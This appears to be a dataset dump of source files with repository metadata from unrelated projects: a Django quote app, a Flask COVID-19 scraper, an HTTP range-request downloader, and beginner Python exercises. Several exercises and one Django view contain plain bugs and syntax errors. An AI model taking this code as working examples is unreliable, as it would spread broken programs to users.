*\n\nqueryset = PostQ.objects.all()\n\n\nclass QuoteView(ListView):\n model = PostQ\n template_name= 'index.html'\n\n\n\ndef QuoteCategoryView(request,cats):\n quote_category_posts=PostQ.objects.filter(category=cats)\n return render(request,'category.html',{'cats':cats,'quote_category_posts':quote_category_posts})\n\n\ndef Auth(request,auth):\n obj=PostQ.objects.filter(author=auth)\n auth_posts=PostQ.objects.filter(author__exact=obj.id)\n\n return render(request,'author.html',{'auth':auth,'auth_posts':auth_posts})\n\n\nclass AddQuoteView(CreateView):\n model=PostQ\n template_name='upload.html'\n form_class = QuoteForm\n ##fields='__all__'\n\n\n\ndef query_to_csv(queryset, filename='items.csv', **override):\n field_names = [field.name for field in queryset.model._meta.fields]\n def field_value(row, field_name):\n if field_name in override.keys():\n return override[field_name]\n else:\n return row[field_name]\n with open(filename, 'w+', encoding='utf-8') as csvfile:\n writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL, delimiter=',')\n writer.writerow(field_names) \n for row in queryset.values(*field_names):\n writer.writerow([field_value(row, field) for field in field_names])\n\n\nquery_to_csv(queryset, filename='data.csv', user=1, group=1)\n\n\n\ndef display(request):\n if request.method == 'POST':\n if request.POST.get('keyword'):#if request.POST.get('keyword') and request.POST.get('videos'):\n post=Post()\n post.keyword = request.POST.get('keyword')\n post.min_videos = 10 #request.POST.get('videos')\n post.save()\n q= Post.objects.all().order_by('-created_on')[:1]\n \n query_to_csv(q, filename='serchin.csv', user=1, group=1)\n d = read_data('serchin.csv')\n key = d['keyword']\n key = key[0]\n url = d['min_videos']\n url =url[0]\n sl = SearchView( key,url)\n s2 = sl.postl()\n \n if len(s2) == 0:\n return HttpResponse('Not Found')\n url=[]\n for i in s2:\n c=PostQ.objects.get(id=i)\n url.append(c)\n context={\n 'url':url\n }\n \n return render(request,'create.html',context)\n else:\n return render(request,'index.html')" }, { "alpha_fraction": 0.8165137767791748, "alphanum_fraction": 0.8165137767791748, "avg_line_length": 35.33333206176758, "blob_id": "e49f460c0c6819479e3cb21ee153ee18db2f1718", "content_id": "63db8a48588374853eeaf12f2cd707da7a10be1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 54, "num_lines": 9, "path": "/r/members/views.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.views import generic\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy\n\nclass UserRegisterView(generic.CreateView):\n form_class=UserCreationForm\n template_name='registration/registration.html'\n success_url=reverse_lazy('login')\n" }, { "alpha_fraction": 0.4787878692150116, "alphanum_fraction": 0.6863636374473572, "avg_line_length": 15.5, "blob_id": "ec0d6148dcefbd124da9c455a66d3783a49a3084", "content_id": "3b45bca866f34922083370010c2fa2514d287411", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 660, "license_type": "no_license", "max_line_length": 25, "num_lines": 40, "path": "/r/requirements.txt", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "appdirs==1.4.4\nastroid==2.4.2\nclick==7.1.2\ncolorama==0.4.3\ndistlib==0.3.1\ndj-database-url==0.5.0\nDjango==2.2\ndjango-ckeditor==5.9.0\ndjango-js-asset==1.2.2\nfilelock==3.0.12\ngunicorn==20.0.4\nimportlib-metadata==1.7.0\nisort==4.3.21\njoblib==0.16.0\nlazy-object-proxy==1.4.3\nmccabe==0.6.1\nnltk==3.5\nnumpy==1.19.1\npackaging==20.4\npandas==1.1.0\nPillow==7.2.0\npsycopg2==2.8.5\npylint==2.5.3\npyparsing==2.4.7\npytesseract==0.3.5\npython-dateutil==2.8.1\npytz==2020.1\nregex==2020.7.14\nscikit-learn==0.23.2\nscipy==1.5.2\nsix==1.15.0\nsqlparse==0.3.1\nthreadpoolctl==2.1.0\ntoml==0.10.1\ntqdm==4.48.2\ntyped-ast==1.4.1\nvirtualenv==20.0.30\nwhitenoise==3.3.1\nwrapt==1.12.1\nzipp==3.1.0\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7250000238418579, "avg_line_length": 29, "blob_id": "05386591fc36c97ef83e8f59cf5ccf96317ce299", "content_id": "befd6e30d388d98a3b8273bf2f104897e2473ed2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 80, "num_lines": 28, "path": "/r/r2/models.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import reverse\n#from ckeditor.fields import RichTextField\n\nclass PostQ(models.Model):\n author=models.ForeignKey(User,on_delete=models.CASCADE)\n category=models.CharField(max_length=255)\n likes=models.ManyToManyField(User,related_name='blog', blank=True,null=True)\n created_on=models.DateTimeField(auto_now_add=True)\n body=models.CharField(max_length=255)\n\n def total_likes(self):\n return self.likes.count()\n\n def __str__(self):\n return self.category\n\n def get_absolute_url(self):\n return reverse('quote-detail')\n\n\n\n \nclass Post(models.Model):\n keyword = models.CharField(max_length=255)\n min_videos = models.IntegerField()\n created_on = models.DateTimeField(auto_now_add=True, null=True)\n" } ]
12
ssungs/covid19-cases
https://github.com/ssungs/covid19-cases
770de606bebd700339ab87be1bd4a8cee5fefdca
9048b1e52a2b029305104e01bcbfd0a2799a0db4
aac32404c0db4ef983cde3718c16f6d1b3341fb7
refs/heads/main
2023-03-07T00:36:03.830296
2021-02-18T17:08:00
2021-02-18T17:08:00
340,082,817
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6604166626930237, "alphanum_fraction": 0.6937500238418579, "avg_line_length": 25.66666603088379, "blob_id": "37a88a26e2e983bdf0d83d200358753571f813b2", "content_id": "079ebece23b7eea5e09a2355b15366dd38b602ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 480, "license_type": "no_license", "max_line_length": 76, "num_lines": 18, "path": "/server.py", "repo_name": "ssungs/covid19-cases", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom covid19_cases_data import Covid19_cases_data\n\n\napp = Flask(__name__)\n\[email protected]('/')\ndef index():\n cases = 'Covid19 cases in Korea'\n return render_template('index.html', cases=cases)\n\[email protected]('/covid19_korea_cases')\ndef show_user():\n casesdata=Covid19_cases_data()\n return render_template('covid19_korea_cases.html', cases_data=casesdata)\n\nif __name__=='__main__':\n app.run(host='localhost', port=8119, debug=True)\n" }, { "alpha_fraction": 0.6881188154220581, "alphanum_fraction": 0.7153465151786804, "avg_line_length": 35.54545593261719, "blob_id": "7d639e69dfea1f1c398eafdddd933fc7c396b3be", "content_id": "e564049a4190f8dd4ba0e00cbe1076440e3f9d7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 105, "num_lines": 11, "path": "/covid19_cases_data.py", "repo_name": "ssungs/covid19-cases", "src_encoding": "UTF-8", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport lxml\n\ndef Covid19_cases_data():\n url = 'https://en.wikipedia.org/wiki/Template:COVID-19_pandemic_data/South_Korea_medical_cases_chart'\n response = requests.get(url)\n html_text = response.text\n soup = BeautifulSoup(html_text, 'lxml')\n class_id = soup.find_all('tr', attrs={'id':'mw-customcollapsible-2021feb-l15'})\n return class_id\n\n\n" } ]
2
harshs404/pythontutorial
https://github.com/harshs404/pythontutorial
d6c2855fce6ca533abc1d0a6924e86be60771d3e
c26fd17783d83e452d8ff206da79bdd91f308afb
057850146c5de633c64c749b0197bf532fa1387c
refs/heads/master
2022-07-09T07:08:44.348345
2020-05-17T16:14:08
2020-05-17T16:14:08
264,706,909
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 26, "blob_id": "c02069389f1d5bb7949d5742a30198b4e17796d7", "content_id": "152ec8e1828f0a1c5e9cb6314d8e3c0f7b9e3da5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27, "license_type": "no_license", "max_line_length": 26, "num_lines": 1, "path": "/helloworld.py", "repo_name": "harshs404/pythontutorial", "src_encoding": "UTF-8", "text": "print('hello, i am harsh')\n" } ]
1
lanpangzhu/multiget
https://github.com/lanpangzhu/multiget
9b3c878d2ed4680236d82bbfc3477da1f7836373
55e691a1eea488bcf7a59a54e4a072aedbe50311
b522a9c3799b03aac991c9e67a44e077d868b6ba
refs/heads/master
2020-04-29T19:40:07.450114
2019-03-21T19:37:36
2019-03-21T19:37:36
176,362,899
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6382121443748474, "alphanum_fraction": 0.6635334491729736, "avg_line_length": 30.59393882751465, "blob_id": "f44f98a5848019d64b86b2b24110efd164887a91", "content_id": "dcddc15b28fef636df761112aadfd8dde5d80d59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5213, "license_type": "no_license", "max_line_length": 122, "num_lines": 165, "path": "/multiGet", "repo_name": "lanpangzhu/multiget", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3.5\n\nimport argparse\nimport requests\nimport sys\n\nMAXSEGMENTSIZE = 2**20\nSEGMENTS = 4\n\n#address = \"http://speedtest.ftp.otenet.gr/files/test1Mb.db\"\n#address = \"http://speedtest.ftp.otenet.gr/files/bogustest1Mb.db\"\n#address = \"http://speedtest.ftp.otenet.gr/files/test100k.db\"\n#address = \"http://www.gutenberg.org/files/100/100-h/100-h.htm\"\n#address = \"http://f39bf6aacfdfbf.bwtest-aws.pravala.com/384MB.jar\"\n#address = \"ftp://speedtest:[email protected]/test1Mb.db\"\n## head --bytes 4m 384MB.jar > small.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a smallfinal2.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a smallfinal3.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a smallfinal.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a small.jar\n##901f13b5dc2a732a48fdb77c6aa4cc4a smalltest.jar\n\n\ndef check_arg(args=None):\n \"\"\"\n handle command line parameters. paralel is not supported,\n but will be worked on as for the segments and sizes this works\n when the numbers are correctly divided. this will not work say\n if we select zero or perhaps if segs is one, but the server does\n not support ranges. Since i reckon you don't want to flood the network\n with http gets i limit the choices to 1 to 32. the limit for max size is\n in the main portion.\n \"\"\"\n parser = argparse.ArgumentParser(description='muliGet')\n parser.add_argument('address',help=\"HTTP URL to download\")\n parser.add_argument('-parallel',action='store_true',help='Download chunks in parallel instead of sequentially')\n parser.add_argument('-o',type=str,default='mult-get.out',help='Write Output to <file> instead of default')\n parser.add_argument('-segs',type=int,default=SEGMENTS,choices=range(1,33),help='Number of segments to read and write')\n parser.add_argument('-maxsize',type=int,default=MAXSEGMENTSIZE,help='Max Size of segments')\n\n results = parser.parse_args(args)\n return results\n\ndef get_header(address):\n \"\"\"\n get the file header to make an initial attempt at the file to see\n file size and to see if the server supports the range option\n the assumption here is that only HTTP is to be supported since only HTTPS\n was excluded explicitly. \n \"\"\"\n try:\n retval = requests.head(address)\n except Exception as e:\n print(e)\n print(\"Verify the URL please, only HTTP is supported\")\n retval=None\n return retval\n\ndef get_chunk(address,chunksize,chunknum):\n \"\"\"\n get the chunk determined by segment size and the number\n of chunk in the order of the four fetched. if the file is less\n than four megs it should be split in four chunks\n \"\"\"\n \n lowRange=int(chunknum*chunksize)\n hiRange=int((chunknum+1)*chunksize-1)\n\n \n custom_header = { 'Range':'bytes={}-{}'.format(lowRange,hiRange)}\n print(\"r\",end=\" \")\n req = requests.get(address,headers=custom_header)\n if req.status_code != requests.codes['partial_content']:\n print(\"this is an error reading the range {} to {}\".format(lowRange,hiRange))\n print(\"with status code \" + str(req.status_code))\n req.close()\n retval=None\n else:\n retval = req.content\n return retval\n\ndef verify_all(chunks):\n \"\"\"\n verify that all four chunks were recieved before writing them\n to file\n \"\"\"\n retval = True\n \n for i in range(len(chunks)):\n if chunks[i] == None:\n retval = false\n break\n return retval\n\ndef write_chunks(fname,chunks):\n \"\"\"\n write the chunk to file, return true if no issue\n false if an error\n \"\"\"\n retval=True\n\n try:\n f = open(fname,\"wb\");\n except Exception as e:\n print(e)\n print(\"Could not open the file \"+fname)\n retval=False\n return retval\n\n for i in range(len(chunks)):\n try: \n f.write(chunks[i])\n print(\"w \",end=\"\")\n except Exception as e:\n print(e)\n print(\"this is an error writing the segment \" + i)\n f.close()\n retval=False\n break\n return retval\n\ndef init_chunks(numchunks):\n for i in range(numchunks):\n chunks.append(None)\n return chunks\n\nchunks=[] \nparams=check_arg(sys.argv[1:])\naddress = params.address\nfname = params.o\nparallel=params.parallel\nnumchunks=params.segs\nmaxchunk=params.maxsize\n\nif maxchunk == 0:\n print(\"please select a larger maxsize size, 0 is not supported\")\n exit(1)\n \nchunks = init_chunks(numchunks)\n\nhead = get_header(address) \n\nif head.status_code != requests.codes['ok']:\n print(\"An error in the file transfer reading the file:\")\n print(address)\n print(\"the status code is \"+ str(head.status_code))\n sys.exit(1)\nelif head.headers[\"Accept-Ranges\"] == 'none':\n print(\"Ranges not accepted by the server \" + address)\n sys.exit(1)\nelse:\n fileSize = int(head.headers['Content-Length'])\n\n if (fileSize < (numchunks*maxchunk)):\n segment_size = fileSize/numchunks\n else:\n segment_size=maxchunk\n fileSize = numchunks*maxchunk\n \n for i in range(numchunks) :\n chunks[i]=get_chunk(address,segment_size,i)\n\n if verify_all(chunks):\n if write_chunks(fname,chunks):\n print(\"done\")\n" } ]
1
Spasimir70/testrepo
https://github.com/Spasimir70/testrepo
34958708f2a2e01e4fa881b6c25470cf9f84dfa6
87671360ca33e99d48c3343d2c46efbe1963e327
89832070cd9b63af92ffca95d6072b9dd3f79f3b
refs/heads/master
2020-03-27T23:31:04.645017
2014-11-03T23:20:08
2014-11-03T23:20:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6315789222717285, "alphanum_fraction": 0.6526315808296204, "avg_line_length": 20.22222137451172, "blob_id": "953ed4e688c7216cbb079ce3b0e3baaa2d0cb885", "content_id": "3b67f4f790ae91b3f1e3055b4a95d8bb93c9ccf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 42, "num_lines": 9, "path": "/unique_words.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def unique_words_count(arr):\n\tdiction = {}\n\tunique = 0\n\tfor i in arr:\n\t\tdiction[i] = arr.count(i)\n\tfor key in diction:\n\t\tunique += 1\n\treturn unique\nprint(unique_words_count([\"HELLO!\"] * 10))" }, { "alpha_fraction": 0.560538113117218, "alphanum_fraction": 0.6008968353271484, "avg_line_length": 23.66666603088379, "blob_id": "b94c61b50afa81bc428a8952f6085f0820bcf75b", "content_id": "a15fce877eb5f6dde6566e474ca48efd44fe34ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 78, "num_lines": 9, "path": "/fibonacci_list.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def nth_fib_lists(listA, listB, n):\n\tif n == 1\n\t return listA\n\telif n == 2:\n\t return listB\n\telse:\n\t return nth_fib_lists(listA, listB, n-1) + nth_fib_lists(listA, listB, n-2)\n\nprint(nth_fib_lists([1, 2], [1, 3], 6))\n\n" }, { "alpha_fraction": 0.5327102541923523, "alphanum_fraction": 0.5514018535614014, "avg_line_length": 15.538461685180664, "blob_id": "a9b3a61cc093b933ff23b9c9cbc8a000b53321c2", "content_id": "43464b23601d0e5707c34c567897161c66511052", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 214, "license_type": "no_license", "max_line_length": 35, "num_lines": 13, "path": "/zadacha 3 - sum all divisors.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def sum_of_divisors(n):\n\tsum = 0\n\tfor i in range (1, n+1):\n\t\tif n % i == 0:\n\t\t\tsum += i\n\treturn sum\n\ndef main():\n\tnum = int(input(\"Input a number\"))\n\tprint (sum_of_divisors(num))\n\nif __name__ == '__main__':\n\tmain()" }, { "alpha_fraction": 0.4720194637775421, "alphanum_fraction": 0.49635037779808044, "avg_line_length": 24.6875, "blob_id": "a8d4980035cf68c86a19aea9f377697fb194df25", "content_id": "d788442b8be11dd92459fae3b03f1b8b41167443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 411, "license_type": "no_license", "max_line_length": 69, "num_lines": 16, "path": "/zadacha 4 - prime.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def is_prime():\n if n < 0:\n n = -1 * n\n is_number_prime = False if (n % 2 == 0 and n != 2 or n == 1) else\n i = 3\n while i < (ceil(sqrt(n)) + 1) and is_number_prime:\n is_number_prime = (False if (n % i == 0) else True)\n i += 2\n return is_number_prime\n\ndef main():\n num = int (input(\"Input a number\"))\n print (is_number_prime(num))\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6693548560142517, "alphanum_fraction": 0.6693548560142517, "avg_line_length": 29.875, "blob_id": "11596798c817ffec182abf8a98f0380f6335344e", "content_id": "1534b7c41dfc540dff830caeb3c88a9d846efe23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 248, "license_type": "no_license", "max_line_length": 89, "num_lines": 8, "path": "/testtest.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "print \"How old are you?\"\nage = raw_input()\nprint \"Where are you from?\"\nplace = raw_input()\nprint \"What is your favourite football team?\"\nteam = raw_input()\n\nprint \"So, your name is %r, you are from %r and you are a fan of %r\" % (age, place, team)\n\n" }, { "alpha_fraction": 0.6227545142173767, "alphanum_fraction": 0.628742516040802, "avg_line_length": 19.875, "blob_id": "e7302fc162871bfab1244849e3e9778c5d456068", "content_id": "fe7d54767c86f8dc296c18c59204eaba8913f7e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 58, "num_lines": 8, "path": "/count_words.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def count_words(arr):\n\tdiction = {}\n\tcount = 0\n\tfor i in arr:\n\t\tdiction[i] = arr.count(i)\n\t\treturn diction\n\nprint(count_words([\"python\", \"python\", \"python\", \"ruby\"]))\n" }, { "alpha_fraction": 0.5894039869308472, "alphanum_fraction": 0.5960264801979065, "avg_line_length": 19.545454025268555, "blob_id": "6ad56aa94876f21dc0cb8915df3f2da215cef245", "content_id": "94d5c24a2edffea61db30c7e51fb303a1abdc0ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 453, "license_type": "no_license", "max_line_length": 55, "num_lines": 22, "path": "/zadacha 6 - n sevens in a row.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def sevens_in_a_row(arr, n):\n\tbr = 0\n\tfor i in range(arr):\n\t\tif arr[i] == 7:\n\t\t\tbr += 0\n\treturn br == n\n\ndef main():\n\tarray = list()\n\tnum = int(input(\"Enter how many elements you want: \"))\n\tprint ('Enter number in array:')\n\tfor i in range(num):\n\t\tn = input(\"num :\")\n\t\tarray.append(int(n))\n\tprint ('ARRAY: ', array)\n\n\tnum_of_sevens = int(input(\"Enter number of sevens\"))\n\tprint sevens_in_a_row(array, num_of_sevens)\n\n\nif __name__ == '__main__':\n\tmain()\n " }, { "alpha_fraction": 0.5275229215621948, "alphanum_fraction": 0.5412843823432922, "avg_line_length": 28, "blob_id": "293ed56fab018c24e33ec2ddc8673336145cc618", "content_id": "c873a5171ebd8c78c7c3d7ba18b003d1c9a85c2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": "no_license", "max_line_length": 68, "num_lines": 15, "path": "/zadacha 1 - Fibonacci.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def nth_fibonacci(n):\n if n = 1 or n = 2:\n return 1\n else:\n return nth_fibonacci(n-1) + nth_fibonacci(n-2)\n\ndef main():\n n = int(input(Enter a place in the Fibonacci's row))\n while n>= 0:\n print (\"Wrong input! Your place must be a positive number!\")\n n = int(input(\"Enter a new place in Fibonacci's row:\"))\n print (nth_fibonacci(n))\n\n if __name__ == '__main__':\n main()\n\n" }, { "alpha_fraction": 0.6571798324584961, "alphanum_fraction": 0.6934023499488831, "avg_line_length": 24.799999237060547, "blob_id": "f91d4cca2ab223d68319458f4a7eb431646ce1d7", "content_id": "f8ec6d571815fbe4da8ac1bd5943bf9756891d3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 773, "license_type": "no_license", "max_line_length": 57, "num_lines": 30, "path": "/cash_desk_test.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "import unittest\n\nfrom cash_desk import cash_desk\n\nclass CashDeskTest(unittest.TestCase):\n\n\tdef test_total_zero_when_new_instance_made():\n\t\tnew_cash_desk = CashDesk()\n\t\tself.assertEqual(0, new_cash_desk.total())\n\n\n\tdef test_total_zero_when_new_instance_made():\n\t\tnew_cash_desk = CashDesk()\n\t\tnew_cash_desk.take_money({1: 2, 100: 3})\n\t\tself.assertEqual(302, new_cash_desk.total())\n\n\n\tdef test_can_withdraw_money_all_money():\n\t\tnew_cash_desk = CashDesk()\n\t\tnew_cash_desk.take_money({1: 2, 100: 3})\n\t\tself.assertTrue(new_cash_desk.can_withdraw_money(302))\n\n\n def test_can_withdraw_money_all_money():\n\t\tnew_cash_desk = CashDesk()\n\t\tnew_cash_desk.take_money({1: 2, 100: 3})\n\t\tself.assertFalse(new_Cash_desk.can_withdraw_monet(302))\n\nif __name__ == '__main__':\n\tunittest.main()" }, { "alpha_fraction": 0.4628821015357971, "alphanum_fraction": 0.4978165924549103, "avg_line_length": 14.333333015441895, "blob_id": "0cda7d08657af402abcef2a4eaddc4f6a7ca433e", "content_id": "bc8ca1ffea38ae7b1e122c68211845ae4baceb4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 229, "license_type": "no_license", "max_line_length": 35, "num_lines": 15, "path": "/zadacha 2 - sum of digits of a number.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def sum_of_digits(n):\n\tif n < 0:\n\t\tn = -1 * n\n\t\tsum = 0\n\t\twhile (n > 0):\n\t\t\tsum += n % 10\n\t\t\tn //= 10\n\t\treturn sum\n\ndef main():\n\tnum = int(input(\"Input a number\"))\n\tprint (sum_of_digits(num))\n\n\tif __name__ == '__main__':\n\t\tmain()" }, { "alpha_fraction": 0.6321839094161987, "alphanum_fraction": 0.6465517282485962, "avg_line_length": 19.47058868408203, "blob_id": "0baf83afe2d462e8eedfabceadb88546b0f92ca9", "content_id": "2d66c67776d3c78d76ed476e1fb0bdadcec0326d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 348, "license_type": "no_license", "max_line_length": 40, "num_lines": 17, "path": "/zadacha 5 - prime number of divisors.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def prime_number_of_divisors(n):\n\tnumber = 0\n\tfor i in range(1, n+1):\n\t\tif n % i == 0\n\t\tnumber +=1\n\tretun number\n\ndef prime_number_of_divisors(n):\n\tnumber_divisors = number_of_divisors(n)\n\treturn is_prime(number_divisors)\n\ndef main():\n\tnum = int(input(\"Input a number: \"))\n\tprint (prime_number_of_divisors(num))\n\nif __name__ == '__main__':\n\tmain()\n" } ]
11
Sumindar/Basic-python
https://github.com/Sumindar/Basic-python
bbb9d1290f827457d8da8299ebf5d970924349ca
e2afc654bd3e1d468ac706b2184efb491fcc863d
f0003c402094c4efa5717610c9d527dfea7e1b8e
refs/heads/master
2020-03-21T15:14:43.079993
2018-06-26T07:39:25
2018-06-26T07:39:25
138,701,605
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.8039215803146362, "alphanum_fraction": 0.8039215803146362, "avg_line_length": 24.5, "blob_id": "7f2ea7524de09d057ead2cd251b8a6e9da4e0319", "content_id": "27cffe2c3fa89d36447860c61a23aa0bbcc808b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "no_license", "max_line_length": 35, "num_lines": 2, "path": "/README.md", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "# Basic-python\nIt consists of some python examples\n" }, { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.6868131756782532, "avg_line_length": 24, "blob_id": "72e2f0319f64cc52dddccca145b2366ff5810647", "content_id": "d2d9446442c0018d303608e9180b5c55a03885ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 182, "license_type": "no_license", "max_line_length": 30, "num_lines": 7, "path": "/strings.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "message = \"hi!this is python\"\r\n\r\nprint(str.capitalize(message))\r\nprint (message.center(50,' '))\r\nprint(message.center(60,'*'))\r\nprint(message.center(80))\r\nprint(message.count('s')s\r\n" }, { "alpha_fraction": 0.3396226465702057, "alphanum_fraction": 0.3811320662498474, "avg_line_length": 14.5625, "blob_id": "3804e85ee9a146f34cd7df65a1e58f32ed20f376", "content_id": "fa414d90cad74618e1b8054c49f6a1988898d4c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 53, "num_lines": 16, "path": "/nested_loops.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "count = 10\r\nx = 0\r\nwhile x < count:\r\n y = 0\r\n while y < 11:\r\n print(y)\r\n y = y + 1\r\n x = x + 1 \r\n\r\nname = [\"mark\",\"fred\",\"tom\",\"craig\",\"bobby\",\"martha\"]\r\n\r\nfor x in name:\r\n y = 0\r\n while y < 5:\r\n print (x)\r\n y = y + 1\r\n" }, { "alpha_fraction": 0.44950494170188904, "alphanum_fraction": 0.513861358165741, "avg_line_length": 27.705883026123047, "blob_id": "f3a4552b3cee4ef2eb4974f32400a508e3f871bb", "content_id": "89425190301753f1e109e3a3c922e1538c8026b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2020, "license_type": "no_license", "max_line_length": 58, "num_lines": 68, "path": "/letscalculate.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "print(\"hello world\")\r\na = 21\r\nb = 10\r\nc = 0\r\nc = a + b\r\nprint (\"Line 1 - Value of c is \", c)\r\nc += a\r\nprint (\"Line 2 - Value of c is \", c )\r\nc *= a\r\nprint (\"Line 3 - Value of c is \", c )\r\nc /= a \r\nprint (\"Line 4 - Value of c is \", c )\r\nc = 2\r\nc %= a\r\nprint (\"Line 5 - Value of c is \", c)\r\nc **= a\r\nprint (\"Line 6 - Value of c is \", c)\r\nc //= a\r\nprint (\"Line 7 - Value of c is \", c)\r\na = 60 # 60 = 0011 1100\r\nb = 13 # 13 = 0000 1101\r\nprint ('a=',a,':',bin(a),'b=',b,':',bin(b))\r\nc = 0\r\nc = a & b; # 12 = 0000 1100\r\nprint (\"result of AND is \", c,':',bin(c))\r\nc = a | b; # 61 = 0011 1101 \r\nprint (\"result of OR is \", c,':',bin(c))\r\nc = a ^ b; # 49 = 0011 0001\r\nprint (\"result of EXOR is \", c,':',bin(c))\r\nc = ~a; # -61 = 1100 0011\r\nprint (\"result of COMPLEMENT is \", c,':',bin(c))\r\nc = a << 2; # 240 = 1111 0000\r\nprint (\"result of LEFT SHIFT is \", c,':',bin(c))\r\nc = a >> 2; # 15 = 0000 1111\r\nprint (\"result of RIGHT SHIFT is \", c,':',bin(c))\r\na = 10\r\nb = 20\r\nlist = [1, 2, 3, 4, 5 ]\r\nif ( a in list ):\r\n print (\"Line 1 - a is available in the given list\")\r\nelse:\r\n print (\"Line 1 - a is not available in the given list\")\r\nif ( b not in list ):\r\n print (\"Line 2 - b is not available in the given list\")\r\nelse:\r\n print (\"Line 2 - b is available in the given list\")\r\nc=b/a\r\nif ( c in list ):\r\n print (\"Line 3 - a is available in the given list\")\r\nelse:\r\n print (\"Line 3 - a is not available in the given list\")\r\na = 20\r\nb = 20\r\nprint ('Line 1','a=',a,':',id(a), 'b=',b,':',id(b))\r\nif ( a is b ):\r\n print (\"Line 2 - a and b have same identity\")\r\nelse:\r\n print (\"Line 2 - a and b do not have same identity\")\r\nif ( id(a) == id(b) ):\r\n print (\"Line 3 - a and b have same identity\")\r\nelse:\r\n print (\"Line 3 - a and b do not have same identity\")\r\n b = 30\r\nprint ('Line 4','a=',a,':',id(a), 'b=',b,':',id(b))\r\nif ( a is not b ):\r\n print (\"Line 5 - a and b do not have same identity\")\r\nelse:\r\n print (\"Line 5 - a and b have same identity\")\r\n" }, { "alpha_fraction": 0.3776824176311493, "alphanum_fraction": 0.6738197207450867, "avg_line_length": 13.533333778381348, "blob_id": "6e23a404dd53af6e2f46378c18122e3977dfe92c", "content_id": "b27a856b05727b46ca1f904d0f9be6758bc52c3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 233, "license_type": "no_license", "max_line_length": 28, "num_lines": 15, "path": "/casting.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "x = 35\r\nprint(x)\r\nx = 